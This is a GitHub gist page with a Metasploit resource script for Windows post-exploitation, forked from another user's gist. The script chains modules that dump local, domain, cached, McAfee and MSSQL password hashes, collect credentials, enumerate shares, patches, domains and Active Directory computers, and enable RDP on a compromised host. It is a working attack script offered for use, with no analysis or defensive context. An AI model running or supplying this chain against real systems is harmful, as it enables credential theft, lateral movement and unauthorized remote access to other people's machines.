Forked from 1N3/metasploit-post-exploitation-script-for-windows.rc
Created
October 28, 2018 22:00
-
-
Save reanimat0r/b4a69a41cbffd60c619ed9725d1fe45d to your computer and use it in GitHub Desktop.
Metasploit Post Exploitation Script For Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
setg SESSION 1 | |
use post/windows/gather/smart_hashdump | |
run | |
use post/windows/gather/credentials/domain_hashdump | |
run | |
use post/windows/gather/credentials/mcafee_vse_hashdump | |
run | |
use post/windows/gather/credentials/mssql_local_hashdump | |
run | |
use post/windows/gather/hashdump | |
run | |
use post/windows/gather/enum_shares | |
run | |
use post/windows/gather/enum_patches | |
run | |
use post/windows/gather/credentials/domain_hashdump | |
run | |
use post/windows/manage/enable_rdp | |
run | |
use post/windows/gather/enum_domain | |
run | |
use post/windows/gather/credentials/credential_collector | |
run | |
use post/windows/gather/enum_computers | |
run | |
use post/windows/gather/cachedump | |
run | |
use post/windows/gather/enum_ad_computers | |
run |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment